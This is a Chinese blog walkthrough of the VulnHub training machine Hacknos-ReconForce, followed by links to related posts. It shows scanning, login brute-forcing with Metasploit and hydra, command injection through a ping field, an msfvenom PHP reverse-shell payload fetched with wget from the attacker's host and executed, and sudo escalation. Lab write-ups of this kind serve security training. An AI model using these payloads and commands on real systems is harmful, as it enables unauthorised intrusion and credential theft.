Hacknos-ReconForce靶机

最新推荐文章于 2024-07-14 18:34:31 发布
最新推荐文章于 2024-07-14 18:34:31 发布
阅读量743 收藏 6
点赞数 20
文章标签: 网络安全
本文链接:https://blog.csdn.net/m0_73124588/article/details/140384019
版权

靶机下载地址:https://www.vulnhub.com/entry/hacknos-reconforce,416/

找靶机ip(Pcs Systemtechnik GmbH)

arp-scan -l

kali:192.168.43.99

靶机:192.168.43.191

查找靶机开放端口

nmap -sS- -p- 192.168.43.191

访问80端口

爆破网站目录

dirb http://192.168.43.191

连接ftp端口登录尝试,发现密码(Security@hackNos)

将密码加入/usr/share/metasploit-framework/data/wordlists/http_default_pass.txt字典

msfconsole

use auxiliary/scanner/http/http_login

show options

set AUTH_URI /5ecure/

set STOP_ON_SUCCESS true

set RHOSTS 192.168.43.191

exploit

运行

爆破出账号密码

admin:Security@hackNos

点击TroubleShoot输入账号密码进行登录

发现了命令执行的地方

burp抓包进行命令执行

127.0.0.1|ls

查看out.php文件

127.0.0.1|cat out.php

查看用户信息,找到了recon用户

127.0.0.1|cat /etc/passwd

生成一个恶意文件

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.43.99 lport=4444 -f raw > f1.php

开启web服务

python3 -m http.server 80

开启MSF监听

msfconsole

use exploit/multi/handler

set payload php/meterpreter/reverse_tcp

set lport 4444

set lhost 192.168.43.99

burp里下载恶意文件

127.0.0.1|wget http%3a//192/168/43/99:80/f1.php

运行恶意文件

127.0.0.1|php f1.php

尝试拿shell

shell

python -c 'import pty; pty.spawn("/bin/bash")'

查看文件,找到recon

ls -al /home

查看recon

ls -al /home/recon

找到user.txt用户文件,查看文件

cat /home/recon/user.txt

使用hydra进行爆破,出了登录用户和密码

hydra -l recon -P /usr/share/metasploit-framework/data/wordlists/http_default_pass.txt ssh://192.168.43.191

切换用户

su recon

提权

sudo -l

查看root用户目录

sudo ls /root

找到了root.txt文件查看文件,找到flag

sudo cat /root/root.txt

Inviewp
关注
hacknos-reconforce靶机
weixin_73074638的博客
07-11 228
开放了三个端口。
Hacknos-ReconForce靶机渗透测试
weixin_58786230的博客
07-12 258
【代码】Hacknos-ReconForce靶机渗透测试。
Vulnhub靶机HACKNOS_ RECONFORCE (V1.1)
LainWith的博客
02-05 1989
目录介绍信息收集主机发现主机信息探测测试21(ftp)访问网站目录扫描登录爆破命令执行反弹shellFlag1切换身份提权获取Flag2方法1:sudo提权方法2:docer提权参考 介绍 系列: hackNos(此系列共7台) 发布日期:2019 年 11 月 29 日 难度:初级-中级 Flag : 2个,一个普通用户的,一个根用户的 学习: msf爆破网站登录框 命令执行漏洞 msf反弹shell sudo提权、docker提权 靶机地址:https://www.vulnhub.com/entry
vulnhub-hackNos-Reconforce
qq_41810304的博客
02-26 362
下载地址:https://www.vulnhub.com/entry/hacknos-reconforce,416/ 前言: 作为小白(此处省略n个字),文章提到的工具及漏洞仅用于学习。最近有没有什么好看的番剧啊,求推荐啊!!!蹲在家里好无聊啊!!! Kali:192.168.1.4 目标机:192.168.1.28 信息收集(确切的说应该是端口扫描): 漏洞挖掘: 从扫...
vulnhub靶机 Os-hackNos-1
weixin_46107179的博客
03-02 3936
Os-hackNos-1: 靶机下载 https://www.vulnhub.com/entry/hacknos-os-hacknos,401 下载好靶机之后,如果通过虚拟机打开,不能获取ip地址,kali机也扫描不到靶机ip地址的话,就在启动界面按shift,会出现该画面 然后按e进入编辑界面,将ro改为rw single init=/bin/bash 然后按Ctrl+x进入命令行,ip -a查看网卡,名称为ens33,然后对网卡信息进行编辑 vim /etc/network/interfaces改为如下
Vulnhub靶机HACKNOS:OS-HACKNOS-2.1
LainWith的博客
02-05 3213
目录介绍信息收集主机发现主机信息探测网站探测目录扫描wpscan漏扫网站测试POC破解用户密码SSH登录破解用户密码Flag1提权-Flag2参考 介绍 系列: hackNos(此系列共7台) 发布日期:2020 年 1 月 18 日 难度:初级-中级 Flag : 2个,一个普通用户的,一个根用户的 学习: wordpress 安全测试 本地包含漏洞利用 john破解 特权提升 靶机地址:https://www.vulnhub.com/entry/hacknos-reconforce,416/ 信息收
Hacknos-ReconForce
weixin_52953960的博客
07-12 286
【代码】Hacknos-ReconForce
VulnHub:Hacknos-ReconForce
wbplife的博客
07-12 258
不知道登录名是什么,也懒得测试,直接拿msf爆破,连找字典都省了。接下来就需要切换身份为 recon 了,前面曾使用msf爆破过网站,将其字典拿过来,供hydra爆破。爆破出网站的账号密码:admin,Security@hackNos,登录之后,如下图。就是目标靶机...使用Nmap进行详细的扫描发现开放了21/22/80端口....服务提供下载...开启MSF监听模块...并在目标站点上下载并执行PHP代码..爆破出用户名:recon,密码:Security@hackNos。工具进行主机发现...出现。
Hacknos-ReconForce打靶渗透
m0_65112983的博客
07-14 421
Hacknos-ReconForce打靶渗透
靶机系列测试 Os-hackNos-11
08-03
1.收集信息 3.对Drupal 7.57进行安全检测 5.解密文件 7.特权提升
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
vulnhub靶机实战-My-cmsms靶机
09-29
vulnhub靶机实战-My-cmsms靶机 本文档将针对vulnhub靶机实战-My-cmsms靶机,详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。 主机发现 在靶机实战中,主机发现是指通过各种技术手段来发现目标网络中...
sqli-labs-master靶机
10-12
sqli-labs是一个专门为学习和测试SQL注入技术而设计的靶机平台,它提供了多个层次的练习,帮助用户逐步理解和掌握SQL注入的防范与应对策略。 一、sqli-labs靶机介绍 sqli-labs靶机由一系列精心设计的挑战组成,每个...
Os-HackNos-2.1靶机
weixin_46062722的博客
11-18 301
实验环境 攻击机器IP地址:192.168.4.93 目标靶机IP地址:192.168.4.87 网络环境:桥接网络 信息收集 先查看攻击机kali Linux的IP地址 命令:ifconfig 得到自己的IP地址192.168.4.93 我们用Nmap扫描一下存活的主机 命令:nmap -sP 192.168.4.0/24 得到目标靶机IP地址为192.168.4.87 既然我们得到了目标靶机的IP地址,用nmap工具进行端口扫描,发现开放了22和80端口 命令:nmap -A -v 192.16
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8491
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
深入剖析Oracle与MySQL在事务处理上的差异
10-06
在数据库管理系统中,事务处理是确保数据一致性和完整性的关键机制。Oracle和MySQL作为两大主流的数据库系统,在事务处理方面有着各自的特点和差异。本文将从事务的基本概念、隔离级别、锁机制以及事务控制语句等方面,详细探讨Oracle与MySQL在事务处理上的差异,并提供代码示例。 Oracle和MySQL在事务处理上有着各自的特点。Oracle提供了强大的并发控制和隔离级别管理,适合处理复杂的企业级事务。MySQL则以其简单性和灵活性,在Web应用和中小型项目中广泛使用。了解这些差异对于开发者选择合适的数据库系统以及优化事务处理至关重要。通过本文的分析和代码示例,读者应该能够更深入地理解Oracle与MySQL在事务处理上的差异,并在实际应用中做出更合适的选择。
电力系统稳态分析-考研必备
10-06
电力系统分析经典教材资料
人工智能在高中信息技术教学中的应用与实践.pdf
最新发布
10-06
毕业设计选题/开题答辩/项目源码/论文等资源 硕博论文、期刊资源、有需要可详细咨询 毕业设计选题/开题答辩/项目源码/论文等资源 硕博论文、期刊资源、有需要可详细咨询毕业设计选题/开题答辩/项目源码/论文等资源 硕博论文、期刊资源、有需要可详细咨询毕业设计选题/开题答辩/项目源码/论文等资源 硕博论文、期刊资源、有需要可详细咨询毕业设计选题/开题答辩/项目源码/论文等资源 硕博论文、期刊资源、有需要可详细咨询毕业设计选题/开题答辩/项目源码/论文等资源 硕博论文、期刊资源、有需要可详细咨询毕业设计选题/开题答辩/项目源码/论文等资源 硕博论文、期刊资源、有需要可详细咨询毕业设计选题/开题答辩/项目源码/论文等资源 硕博论文、期刊资源、有需要可详细咨询毕业设计选题/开题答辩/项目源码/论文等资源 硕博论文、期刊资源、有需要可详细咨询毕业设计选题/开题答辩/项目源码/论文等资源 硕博论文、期刊资源、有需要可详细咨询毕业设计选题/开题答辩/项目源码/论文等资源 硕博论文、期刊资源、有需要可详细咨询毕业设计选题/开题答辩/项目源码/论文等资源 硕博论文、期刊资源、有需要可详细咨询
kali linux部署upload-labs靶机
09-08
要在Kali Linux上部署upload-labs靶机,您需要按照以下步骤进行操作: 1. 首先,您需要通过SSH连接到一个Linux主机。根据提供的端口和地址,使用以下命令连接到目标主机: `ssh -p 25142 root@node4.buuoj.cn` 2....
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值